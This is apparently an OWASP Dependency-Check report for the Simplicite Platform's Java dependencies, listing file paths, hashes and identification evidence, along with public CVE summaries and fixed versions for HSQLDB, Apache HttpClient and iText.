cpe:2.3:a:com.h2database:h2:1.4.199:*:*:*:*:*:*:* h2-1.4.199.jar: data.zip: table.jsFile Path: /var/simplicite/.m2/repository/com/h2database/h2/1.4.199/h2-1.4.199.jar/org/h2/util/data.zip/org/h2/server/web/res/table.jsMD5: 289efd1154e2d82bd3fff47f88ba76f8SHA1: 236891ee6a10b1af6f9824fb91be634474ab9ebeSHA256: 4cca2cf66410a065181050b98003ecf35291deb2c70b9484b0e3c79c7068f454Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence
h2-1.4.199.jar: data.zip: tree.jsFile Path: /var/simplicite/.m2/repository/com/h2database/h2/1.4.199/h2-1.4.199.jar/org/h2/util/data.zip/org/h2/server/web/res/tree.jsMD5: 01bfc955082b057fbef6b096569b98eaSHA1: f6e97f37a8929ea4b6a2bfd08619888329e15160SHA256: 87605a4b4bec508664529e4700ebd08753e2d65a11e532ab15ebf996d3dd8805Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence
hamcrest-core-1.3.jarDescription:
This is the core API of hamcrest matcher framework to be used by third-party framework providers. This includes the a foundation set of matcher implementations for common operations.
File Path: /var/simplicite/.m2/repository/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jarMD5: 6393363b47ddcbba82321110c3e07519SHA1: 42a25dc3219429f0e5d060061f71acb49bf010a0SHA256: 66fdef91e9739348df7a096aa384a5685f4e875584cce89386a7a47251c4d8e9Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name hamcrest-core High Vendor jar package name core Highest Vendor jar package name hamcrest Highest Vendor jar package name matcher Highest Vendor Manifest built-date 2012-07-09 19:49:34 Low Vendor Manifest Implementation-Vendor hamcrest.org High Vendor pom artifactid hamcrest-core Highest Vendor pom artifactid hamcrest-core Low Vendor pom groupid org.hamcrest Highest Vendor pom name Hamcrest Core High Vendor pom parent-artifactid hamcrest-parent Low Product file name hamcrest-core High Product jar package name core Highest Product jar package name hamcrest Highest Product jar package name matcher Highest Product Manifest built-date 2012-07-09 19:49:34 Low Product Manifest Implementation-Title hamcrest-core High Product pom artifactid hamcrest-core Highest Product pom groupid org.hamcrest Highest Product pom name Hamcrest Core High Product pom parent-artifactid hamcrest-parent Medium Version file version 1.3 High Version Manifest Implementation-Version 1.3 High Version pom version 1.3 Highest
hsqldb-2.5.0.jarDescription:
HSQLDB - Lightweight 100% Java SQL Database Engine License:
HSQLDB License, a BSD open source license: http://hsqldb.org/web/hsqlLicense.html File Path: /var/simplicite/.m2/repository/org/hsqldb/hsqldb/2.5.0/hsqldb-2.5.0.jar
MD5: 0e1021ba547f94a472f3e76806747f7b
SHA1: 59298fcd77faf01e02b405def2f80cccbf582508
SHA256: acda459cc9d6a07b39b284364e93b5f29e11877d687e9544b91778d3554d2b38
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name hsqldb High Vendor jar package name database Highest Vendor jar package name hsqldb Highest Vendor jar package name java Highest Vendor Manifest build-vendor blaine Medium Vendor Manifest bundle-symbolicname org.hsqldb.hsqldb Medium Vendor Manifest Implementation-Vendor The HSQL Development Group High Vendor Manifest originally-created-by 1.8.0_212-b01 (Oracle Corporation) Low Vendor Manifest specification-vendor The HSQL Development Group Low Vendor pom artifactid hsqldb Highest Vendor pom artifactid hsqldb Low Vendor pom developer email blaine.simpson@admc.com Low Vendor pom developer id unsaved Medium Vendor pom developer name Blaine Simpson Medium Vendor pom groupid org.hsqldb Highest Vendor pom name HyperSQL Database High Vendor pom organization name The HSQL Development Group High Vendor pom organization url http://hsqldb.org Medium Vendor pom url http://hsqldb.org Highest Product file name hsqldb High Product jar package name database Highest Product jar package name hsqldb Highest Product jar package name java Highest Product Manifest Bundle-Name HSQLDB Medium Product Manifest bundle-symbolicname org.hsqldb.hsqldb Medium Product Manifest Implementation-Title Standard runtime High Product Manifest originally-created-by 1.8.0_212-b01 (Oracle Corporation) Low Product Manifest specification-title HSQLDB Medium Product pom artifactid hsqldb Highest Product pom developer email blaine.simpson@admc.com Low Product pom developer id unsaved Low Product pom developer name Blaine Simpson Low Product pom groupid org.hsqldb Highest Product pom name HyperSQL Database High Product pom organization name The HSQL Development Group Low Product pom organization url http://hsqldb.org Low Product pom url http://hsqldb.org Medium Version file version 2.5.0 High Version Manifest Bundle-Version 2.5.0 High Version Manifest Implementation-Version 2.5.0 High Version pom version 2.5.0 Highest
CVE-2022-41853 suppress
Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled. NVD-CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions:
httpclient-4.5.10.jarDescription:
Apache HttpComponents Client
File Path: /var/simplicite/.m2/repository/org/apache/httpcomponents/httpclient/4.5.10/httpclient-4.5.10.jarMD5: 367221dde0ef94ea3507928ef40cbe75SHA1: 7ca2e4276f4ef95e4db725a8cd4a1d1e7585b9e5SHA256: 38b9f16f504928e4db736a433b9cd10968d9ec8d6f5d0e61a64889a689172134Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name httpclient High Vendor jar package name apache Highest Vendor jar package name client Highest Vendor jar package name httpclient Highest Vendor Manifest automatic-module-name org.apache.httpcomponents.httpclient Medium Vendor Manifest implementation-url http://hc.apache.org/httpcomponents-client Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.httpcomponents Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid httpclient Highest Vendor pom artifactid httpclient Low Vendor pom groupid org.apache.httpcomponents Highest Vendor pom name Apache HttpClient High Vendor pom parent-artifactid httpcomponents-client Low Vendor pom url http://hc.apache.org/httpcomponents-client Highest Product file name httpclient High Product jar package name apache Highest Product jar package name client Highest Product jar package name http Highest Product jar package name httpclient Highest Product Manifest automatic-module-name org.apache.httpcomponents.httpclient Medium Product Manifest Implementation-Title Apache HttpClient High Product Manifest implementation-url http://hc.apache.org/httpcomponents-client Low Product Manifest specification-title Apache HttpClient Medium Product pom artifactid httpclient Highest Product pom groupid org.apache.httpcomponents Highest Product pom name Apache HttpClient High Product pom parent-artifactid httpcomponents-client Medium Product pom url http://hc.apache.org/httpcomponents-client Medium Version file version 4.5.10 High Version Manifest Implementation-Version 4.5.10 High Version pom version 4.5.10 Highest
CVE-2020-13956 suppress
Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution. NVD-CWE-noinfo
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N References:
Vulnerable Software & Versions: (show all )
httpcore-4.4.12.jarDescription:
Apache HttpComponents Core (blocking I/O)
File Path: /var/simplicite/.m2/repository/org/apache/httpcomponents/httpcore/4.4.12/httpcore-4.4.12.jarMD5: c152f231bf2570eca354c49ef8756b41SHA1: 21ebaf6d532bc350ba95bd81938fa5f0e511c132SHA256: ab765334beabf0ea024484a5e90a7c40e8160b145f22d199e11e27f68d57da08Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name httpcore High Vendor jar package name apache Highest Vendor Manifest automatic-module-name org.apache.httpcomponents.httpcore Medium Vendor Manifest implementation-build ${scmBranch}@r${buildNumber}; 2019-09-01 11:24:32+0000 Low Vendor Manifest implementation-url http://hc.apache.org/httpcomponents-core-ga Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor Manifest url http://hc.apache.org/httpcomponents-core-ga Low Vendor pom artifactid httpcore Highest Vendor pom artifactid httpcore Low Vendor pom groupid org.apache.httpcomponents Highest Vendor pom name Apache HttpCore High Vendor pom parent-artifactid httpcomponents-core Low Vendor pom url http://hc.apache.org/httpcomponents-core-ga Highest Product file name httpcore High Product jar package name apache Highest Product jar package name http Highest Product Manifest automatic-module-name org.apache.httpcomponents.httpcore Medium Product Manifest implementation-build ${scmBranch}@r${buildNumber}; 2019-09-01 11:24:32+0000 Low Product Manifest Implementation-Title HttpComponents Apache HttpCore High Product Manifest implementation-url http://hc.apache.org/httpcomponents-core-ga Low Product Manifest specification-title HttpComponents Apache HttpCore Medium Product Manifest url http://hc.apache.org/httpcomponents-core-ga Low Product pom artifactid httpcore Highest Product pom groupid org.apache.httpcomponents Highest Product pom name Apache HttpCore High Product pom parent-artifactid httpcomponents-core Medium Product pom url http://hc.apache.org/httpcomponents-core-ga Medium Version file version 4.4.12 High Version Manifest Implementation-Version 4.4.12 High Version pom version 4.4.12 Highest
httpmime-4.5.10.jarDescription:
Apache HttpComponents HttpClient - MIME coded entities
File Path: /var/simplicite/.m2/repository/org/apache/httpcomponents/httpmime/4.5.10/httpmime-4.5.10.jarMD5: 47abc8053a7cdaaee8a7f5c727955cedSHA1: 3513ca10d24d7aa962741c90e914fec650f0848cSHA256: 2bdf3dc862e39e2c69e42f036759e53d457af35a7ce178d8cf286fdb42528864Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name httpmime High Vendor jar package name apache Highest Vendor jar package name mime Highest Vendor Manifest automatic-module-name org.apache.httpcomponents.httpmime Medium Vendor Manifest implementation-url http://hc.apache.org/httpcomponents-client Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.httpcomponents Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid httpmime Highest Vendor pom artifactid httpmime Low Vendor pom groupid org.apache.httpcomponents Highest Vendor pom name Apache HttpClient Mime High Vendor pom parent-artifactid httpcomponents-client Low Vendor pom url http://hc.apache.org/httpcomponents-client Highest Product file name httpmime High Product jar package name apache Highest Product jar package name http Highest Product jar package name mime Highest Product Manifest automatic-module-name org.apache.httpcomponents.httpmime Medium Product Manifest Implementation-Title Apache HttpClient Mime High Product Manifest implementation-url http://hc.apache.org/httpcomponents-client Low Product Manifest specification-title Apache HttpClient Mime Medium Product pom artifactid httpmime Highest Product pom groupid org.apache.httpcomponents Highest Product pom name Apache HttpClient Mime High Product pom parent-artifactid httpcomponents-client Medium Product pom url http://hc.apache.org/httpcomponents-client Medium Version file version 4.5.10 High Version Manifest Implementation-Version 4.5.10 High Version pom version 4.5.10 Highest
httpservices-4.5.5.jarFile Path: /var/simplicite/.m2/repository/edu/ucar/httpservices/4.5.5/httpservices-4.5.5.jarMD5: c5207827b8b7e6045b2af7e1e8c5b1d4SHA1: ee5f217be599e5e03f7f0e55e03f9e721a154f62SHA256: 8334da7adc9ed7a7b941a780f4d22054f8a11d03973be83ae8399400d55300e4Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name httpservices High Vendor jar package name httpservices Highest Vendor jar package name ucar Highest Vendor Manifest built-on 20150306.1537 Low Vendor Manifest Implementation-Vendor UCAR/Unidata High Vendor Manifest Implementation-Vendor-Id edu.ucar Medium Vendor pom artifactid httpservices Highest Vendor pom artifactid httpservices Low Vendor pom groupid edu.ucar Highest Vendor pom name HttpClient Wrappers High Vendor pom parent-artifactid thredds-parent Low Vendor pom url http://www.unidata.ucar.edu/software/netcdf-java/documentation.htm Highest Product file name httpservices High Product jar package name httpservices Highest Product jar package name ucar Highest Product Manifest built-on 20150306.1537 Low Product Manifest Implementation-Title HttpClient Wrappers High Product pom artifactid httpservices Highest Product pom groupid edu.ucar Highest Product pom name HttpClient Wrappers High Product pom parent-artifactid thredds-parent Medium Product pom url http://www.unidata.ucar.edu/software/netcdf-java/documentation.htm Medium Version file version 4.5.5 High Version Manifest Implementation-Version 4.5.5 High Version pom version 4.5.5 Highest
icu4j-64.2.jarDescription:
International Component for Unicode for Java (ICU4J) is a mature, widely used Java library
providing Unicode and Globalization support
License:
Unicode/ICU License: https://raw.githubusercontent.com/unicode-org/icu/master/icu4c/LICENSE File Path: /var/simplicite/.m2/repository/com/ibm/icu/icu4j/64.2/icu4j-64.2.jar
MD5: 56a4015e1362c79dee5bd06feabc3116
SHA1: 1d2b0ed49ba380d0c69c0a912a9909c1dbcc3d7c
SHA256: ec5a7d92495a2c0f0a09506aef935cca6a68ce8ac18fbae105381a38288127e3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name icu4j High Vendor file (hint) name icu-project High Vendor file (hint) name unicode High Vendor jar package name ibm Highest Vendor jar package name icu Highest Vendor Manifest automatic-module-name com.ibm.icu Medium Vendor Manifest bundle-copyright © 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html#License Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.7 Low Vendor Manifest bundle-symbolicname com.ibm.icu Medium Vendor Manifest Implementation-Vendor Unicode, Inc. High Vendor Manifest Implementation-Vendor-Id org.unicode Medium Vendor pom artifactid icu4j Highest Vendor pom artifactid icu4j Low Vendor pom developer id deborah Medium Vendor pom developer id dougfelt Medium Vendor pom developer id JCEmmons Medium Vendor pom developer id macchiati Medium Vendor pom developer id markusicu Medium Vendor pom developer id pedberg Medium Vendor pom developer id srl295 Medium Vendor pom developer id yumaoka Medium Vendor pom developer name Deborah Goldsmith Medium Vendor pom developer name Doug Felt Medium Vendor pom developer name John Emmons Medium Vendor pom developer name Mark Davis Medium Vendor pom developer name Markus Scherer Medium Vendor pom developer name Peter Edberg Medium Vendor pom developer name Steven Loomis Medium Vendor pom developer name Yoshito Umaoka Medium Vendor pom developer org Apple Medium Vendor pom developer org Google Medium Vendor pom developer org IBM Corporation Medium Vendor pom groupid com.ibm.icu Highest Vendor pom name ICU4J High Vendor pom url http://icu-project.org/ Highest Vendor pom (hint) artifactid icu-project Highest Vendor pom (hint) artifactid icu-project Low Vendor pom (hint) artifactid unicode Highest Vendor pom (hint) artifactid unicode Low Vendor pom (hint) name icu-project High Vendor pom (hint) name unicode High Product file name icu4j High Product hint analyzer product international_components_for_unicode Highest Product jar package name ibm Highest Product jar package name icu Highest Product Manifest automatic-module-name com.ibm.icu Medium Product Manifest bundle-copyright © 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html#License Low Product Manifest Bundle-Name ICU4J Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.7 Low Product Manifest bundle-symbolicname com.ibm.icu Medium Product Manifest Implementation-Title International Components for Unicode for Java High Product Manifest specification-title International Components for Unicode for Java Medium Product pom artifactid icu4j Highest Product pom developer id deborah Low Product pom developer id dougfelt Low Product pom developer id JCEmmons Low Product pom developer id macchiati Low Product pom developer id markusicu Low Product pom developer id pedberg Low Product pom developer id srl295 Low Product pom developer id yumaoka Low Product pom developer name Deborah Goldsmith Low Product pom developer name Doug Felt Low Product pom developer name John Emmons Low Product pom developer name Mark Davis Low Product pom developer name Markus Scherer Low Product pom developer name Peter Edberg Low Product pom developer name Steven Loomis Low Product pom developer name Yoshito Umaoka Low Product pom developer org Apple Low Product pom developer org Google Low Product pom developer org IBM Corporation Low Product pom groupid com.ibm.icu Highest Product pom name ICU4J High Product pom url http://icu-project.org/ Medium Version file version 64.2 High Version Manifest Bundle-Version 64.2 High Version Manifest Implementation-Version 64.2 High Version pom version 64.2 Highest
pkg:maven/com.ibm.icu/icu4j@64.2 (Confidence :High)cpe:2.3:a:icu-project:international_components_for_unicode:64.2:*:*:*:*:*:*:* (Confidence :Low) suppress cpe:2.3:a:unicode:international_components_for_unicode:64.2:*:*:*:*:*:*:* (Confidence :Low) suppress isoparser-1.1.22.jarDescription:
A generic parser and writer for all ISO 14496 based files (MP4, Quicktime, DCF, PDCF, ...)
License:
Apache Software License - Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/googlecode/mp4parser/isoparser/1.1.22/isoparser-1.1.22.jar
MD5: b6cb35cf16232e5850de5900f753ed91
SHA1: 70b5c26b52c120d2e94643717a764c4a67640fd6
SHA256: f37f0a997dcc494409b60aeb48cef319348503f84efcd1edcb0fcfb81148fc2d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name isoparser High Vendor jar package name googlecode Highest Vendor jar package name iso Highest Vendor jar package name mp4 Highest Vendor jar package name mp4parser Highest Vendor jar package name mp4parser Low Vendor pom artifactid isoparser Highest Vendor pom artifactid isoparser Low Vendor pom developer email Sebastian.Annies@googlemail.com Low Vendor pom developer id sannies Medium Vendor pom groupid com.googlecode.mp4parser Highest Vendor pom name ISO Parser High Vendor pom url http://code.google.com/p/mp4parser/ Highest Product file name isoparser High Product jar package name googlecode Highest Product jar package name iso Highest Product jar package name mp4 Highest Product jar package name mp4parser Highest Product pom artifactid isoparser Highest Product pom developer email Sebastian.Annies@googlemail.com Low Product pom developer id sannies Low Product pom groupid com.googlecode.mp4parser Highest Product pom name ISO Parser High Product pom url http://code.google.com/p/mp4parser/ Medium Version file version 1.1.22 High Version pom version 1.1.22 Highest
istack-commons-runtime-3.0.8.jarDescription:
istack common utility code License:
http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/com/sun/istack/istack-commons-runtime/3.0.8/istack-commons-runtime-3.0.8.jar
MD5: d8555a2f242c55d6727b4d0e82ab8446
SHA1: d6a97364045aa6b99bf2d3c566a3f98599c2d296
SHA256: 4ffabb06be454a05e4398e20c77fa2b6308d4b88dfbef7ca30a76b5b7d5505ef
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name istack-commons-runtime High Vendor jar package name istack Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname com.sun.istack.commons-runtime Medium Vendor Manifest implementation-build-id 3.0.8-5384038, 2018-12-27T14:45:41+0000 Low Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id com.sun.istack Medium Vendor pom artifactid istack-commons-runtime Highest Vendor pom artifactid istack-commons-runtime Low Vendor pom groupid com.sun.istack Highest Vendor pom name istack common utility code runtime High Vendor pom parent-artifactid istack-commons Low Product file name istack-commons-runtime High Product jar package name istack Highest Product jar package name sun Highest Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name istack common utility code runtime Medium Product Manifest bundle-symbolicname com.sun.istack.commons-runtime Medium Product Manifest implementation-build-id 3.0.8-5384038, 2018-12-27T14:45:41+0000 Low Product pom artifactid istack-commons-runtime Highest Product pom groupid com.sun.istack Highest Product pom name istack common utility code runtime High Product pom parent-artifactid istack-commons Medium Version file version 3.0.8 High Version Manifest Bundle-Version 3.0.8 High Version pom version 3.0.8 Highest
istack-commons-tools-3.0.8.jarDescription:
istack common utility code License:
http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/com/sun/istack/istack-commons-tools/3.0.8/istack-commons-tools-3.0.8.jar
MD5: 920af7b9915c9724948517228e727a11
SHA1: a9bb4e2d83d50623bb2dd26cde8d7dd88e6b7104
SHA256: 3b0e0a85924ebb91303175f2a2183c7f9246fa00342be95205397e73434008ec
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name istack-commons-tools High Vendor jar package name istack Highest Vendor jar package name sun Highest Vendor jar package name tools Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname com.sun.istack.commons-tools Medium Vendor Manifest implementation-build-id 3.0.8-5384038, 2018-12-27T14:45:41+0000 Low Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id com.sun.istack Medium Vendor pom artifactid istack-commons-tools Highest Vendor pom artifactid istack-commons-tools Low Vendor pom groupid com.sun.istack Highest Vendor pom name istack common utility code tools High Vendor pom parent-artifactid istack-commons Low Product file name istack-commons-tools High Product jar package name istack Highest Product jar package name sun Highest Product jar package name tools Highest Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name istack common utility code tools Medium Product Manifest bundle-symbolicname com.sun.istack.commons-tools Medium Product Manifest implementation-build-id 3.0.8-5384038, 2018-12-27T14:45:41+0000 Low Product pom artifactid istack-commons-tools Highest Product pom groupid com.sun.istack Highest Product pom name istack common utility code tools High Product pom parent-artifactid istack-commons Medium Version file version 3.0.8 High Version Manifest Bundle-Version 3.0.8 High Version pom version 3.0.8 Highest
itext-2.1.7.jarDescription:
iText, a free Java-PDF library License:
Mozilla Public License: http://www.mozilla.org/MPL/MPL-1.1.html File Path: /var/simplicite/.m2/repository/com/lowagie/itext/2.1.7/itext-2.1.7.jar
MD5: 7587a618197a065eac4a453d173d4ed6
SHA1: 892bfb3e97074a61123b3b2d7caa2db112750864
SHA256: 7d82c6b097a31cdf5a6d49a327bf582fdec7304da69308f9f6abf54aa9fd9055
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name itext High Vendor jar package name lowagie Highest Vendor jar package name lowagie Low Vendor jar package name pdf Highest Vendor jar package name pdf Low Vendor jar package name text Low Vendor pom artifactid itext Highest Vendor pom artifactid itext Low Vendor pom developer email bruno@lowagie.com Low Vendor pom developer email hallm@users.sourceforge.net Low Vendor pom developer email psoares33@users.sourceforge.net Low Vendor pom developer email xlv@users.sourceforge.net Low Vendor pom developer id blowagie Medium Vendor pom developer id hallm Medium Vendor pom developer id psoares33 Medium Vendor pom developer id xlv Medium Vendor pom developer name Bruno Lowagie Medium Vendor pom developer name Mark Hall Medium Vendor pom developer name Paulo Soares Medium Vendor pom developer name Xavier Le Vourch Medium Vendor pom groupid com.lowagie Highest Vendor pom name iText, a Free Java-PDF library High Vendor pom url http://www.lowagie.com/iText/ Highest Product file name itext High Product jar package name lowagie Highest Product jar package name pdf Highest Product jar package name pdf Low Product jar package name text Low Product pom artifactid itext Highest Product pom developer email bruno@lowagie.com Low Product pom developer email hallm@users.sourceforge.net Low Product pom developer email psoares33@users.sourceforge.net Low Product pom developer email xlv@users.sourceforge.net Low Product pom developer id blowagie Low Product pom developer id hallm Low Product pom developer id psoares33 Low Product pom developer id xlv Low Product pom developer name Bruno Lowagie Low Product pom developer name Mark Hall Low Product pom developer name Paulo Soares Low Product pom developer name Xavier Le Vourch Low Product pom groupid com.lowagie Highest Product pom name iText, a Free Java-PDF library High Product pom url http://www.lowagie.com/iText/ Medium Version file version 2.1.7 High Version pom version 2.1.7 Highest
CVE-2017-9096 (OSSINDEX) suppress
The XML parsers in iText before 5.5.12 and 7.x before 7.0.3 do not disable external entities, which might allow remote attackers to conduct XML external entity (XXE) attacks via a crafted PDF. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.lowagie:itext:2.1.7:*:*:*:*:*:*:* itext-rtf-2.1.7.jarDescription:
iText, a free Java-PDF library (rtf package) License:
Mozilla Public License: http://www.mozilla.org/MPL/MPL-1.1.html File Path: /var/simplicite/.m2/repository/com/lowagie/itext-rtf/2.1.7/itext-rtf-2.1.7.jar
MD5: f95d38da50192bc9e3876e3a987f02c1
SHA1: ed1cbe69ff69c6e6fa7645f51c8d25894a177e7b
SHA256: 49d3b9df20ccc6565c91b8b18c638ecb018fd528b6eb64991d6d8ba73975c135
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name itext-rtf High Vendor jar package name lowagie Highest Vendor jar package name lowagie Low Vendor jar package name rtf Highest Vendor jar package name rtf Low Vendor jar package name text Low Vendor pom artifactid itext-rtf Highest Vendor pom artifactid itext-rtf Low Vendor pom developer email bruno@lowagie.com Low Vendor pom developer email hallm@users.sourceforge.net Low Vendor pom developer email psoares33@users.sourceforge.net Low Vendor pom developer email xlv@users.sourceforge.net Low Vendor pom developer id blowagie Medium Vendor pom developer id hallm Medium Vendor pom developer id psoares33 Medium Vendor pom developer id xlv Medium Vendor pom developer name Bruno Lowagie Medium Vendor pom developer name Mark Hall Medium Vendor pom developer name Paulo Soares Medium Vendor pom developer name Xavier Le Vourch Medium Vendor pom groupid com.lowagie Highest Vendor pom name iText, a Free Java-PDF library (rtf package) High Vendor pom url http://www.lowagie.com/iText/ Highest Product file name itext-rtf High Product jar package name lowagie Highest Product jar package name rtf Highest Product jar package name rtf Low Product jar package name text Low Product pom artifactid itext-rtf Highest Product pom developer email bruno@lowagie.com Low Product pom developer email hallm@users.sourceforge.net Low Product pom developer email psoares33@users.sourceforge.net Low Product pom developer email xlv@users.sourceforge.net Low Product pom developer id blowagie Low Product pom developer id hallm Low Product pom developer id psoares33 Low Product pom developer id xlv Low Product pom developer name Bruno Lowagie Low Product pom developer name Mark Hall Low Product pom developer name Paulo Soares Low Product pom developer name Xavier Le Vourch Low Product pom groupid com.lowagie Highest Product pom name iText, a Free Java-PDF library (rtf package) High Product pom url http://www.lowagie.com/iText/ Medium Version file version 2.1.7 High Version pom version 2.1.7 Highest
j2objc-annotations-1.3.jarDescription:
A set of annotations that provide additional information to the J2ObjC
translator to modify the result of translation.
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/j2objc/j2objc-annotations/1.3/j2objc-annotations-1.3.jar
MD5: 5fa4ec4ec0c5aa70af8a7d4922df1931
SHA1: ba035118bc8bac37d7eff77700720999acd9986d
SHA256: 21af30c92267bd6122c0e0b4d20cccb6641a37eaf956c6540ec471d584e64a7b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name j2objc-annotations High Vendor jar package name annotations Highest Vendor jar package name annotations Low Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name j2objc Highest Vendor jar package name j2objc Low Vendor pom artifactid j2objc-annotations Highest Vendor pom artifactid j2objc-annotations Low Vendor pom groupid com.google.j2objc Highest Vendor pom name J2ObjC Annotations High Vendor pom url google/j2objc/ Highest Product file name j2objc-annotations High Product jar package name annotations Highest Product jar package name annotations Low Product jar package name google Highest Product jar package name j2objc Highest Product jar package name j2objc Low Product pom artifactid j2objc-annotations Highest Product pom groupid com.google.j2objc Highest Product pom name J2ObjC Annotations High Product pom url google/j2objc/ High Version file version 1.3 High Version pom version 1.3 Highest
jackcess-3.0.1.jarDescription:
A pure Java library for reading from and writing to MS Access databases. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/healthmarketscience/jackcess/jackcess/3.0.1/jackcess-3.0.1.jar
MD5: e787e04bfd785b16d366021373309617
SHA1: e753ed760d06a0b6849c02d3d4c603ae6c8e05c8
SHA256: 743bfe830de83f2a64b0ff23337c18f1412c3caf35f98c5f6668f65c109993d7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackcess High Vendor jar package name healthmarketscience Highest Vendor jar package name jackcess Highest Vendor Manifest bundle-docurl https://openhms.sourceforge.io/ Low Vendor Manifest bundle-symbolicname com.healthmarketscience.jackcess Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid jackcess Highest Vendor pom artifactid jackcess Low Vendor pom developer email jahlborn@users.sf.net Low Vendor pom developer email javajedi@users.sf.net Low Vendor pom developer id jahlborn Medium Vendor pom developer id javajedi Medium Vendor pom developer name James Ahlborn Medium Vendor pom developer name Tim McCune Medium Vendor pom developer org Dell Boomi Medium Vendor pom groupid com.healthmarketscience.jackcess Highest Vendor pom name Jackcess High Vendor pom parent-artifactid openhms-parent Low Vendor pom parent-groupid com.healthmarketscience Medium Vendor pom url https://jackcess.sourceforge.io Highest Product file name jackcess High Product jar package name healthmarketscience Highest Product jar package name jackcess Highest Product jar package name version Highest Product Manifest bundle-docurl https://openhms.sourceforge.io/ Low Product Manifest Bundle-Name Jackcess Medium Product Manifest bundle-symbolicname com.healthmarketscience.jackcess Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid jackcess Highest Product pom developer email jahlborn@users.sf.net Low Product pom developer email javajedi@users.sf.net Low Product pom developer id jahlborn Low Product pom developer id javajedi Low Product pom developer name James Ahlborn Low Product pom developer name Tim McCune Low Product pom developer org Dell Boomi Low Product pom groupid com.healthmarketscience.jackcess Highest Product pom name Jackcess High Product pom parent-artifactid openhms-parent Medium Product pom parent-groupid com.healthmarketscience Medium Product pom url https://jackcess.sourceforge.io Medium Version file version 3.0.1 High Version Manifest Bundle-Version 3.0.1 High Version pom parent-version 3.0.1 Low Version pom version 3.0.1 Highest
jackcess-encrypt-3.0.0.jarDescription:
An add-on to the Jackcess library for handling encryption in MS Access files. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/healthmarketscience/jackcess/jackcess-encrypt/3.0.0/jackcess-encrypt-3.0.0.jar
